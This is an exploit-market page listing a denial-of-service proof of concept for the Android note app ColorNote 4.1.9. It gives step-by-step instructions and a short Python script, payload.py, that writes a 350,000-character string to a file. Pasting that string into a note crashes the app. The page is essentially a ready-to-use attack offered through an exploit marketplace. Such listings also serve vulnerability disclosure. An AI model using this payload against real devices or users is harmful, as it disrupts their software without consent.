[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ColorNote 4.1.9 - Denial of Service Exploit

Author
Brian Rodriguez
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-36341
Category
dos / poc
Date add
03-06-2021
Platform
Android
# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC)
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX
# Version: 4.1.9
# Category: DoS (Android)

##### Vulnerability #####

Color Note is vulnerable to a DoS condition when a long list of characters is being used.

# STEPS #
# Open the program
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the new note.
# Click the "Return" button twice.
# Start clicking the screen.
# Crashed

Successful exploitation will causes application stop working.

I have been able to test this exploit against Android 8.0.

##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")

#  0day.today [2024-11-16]  #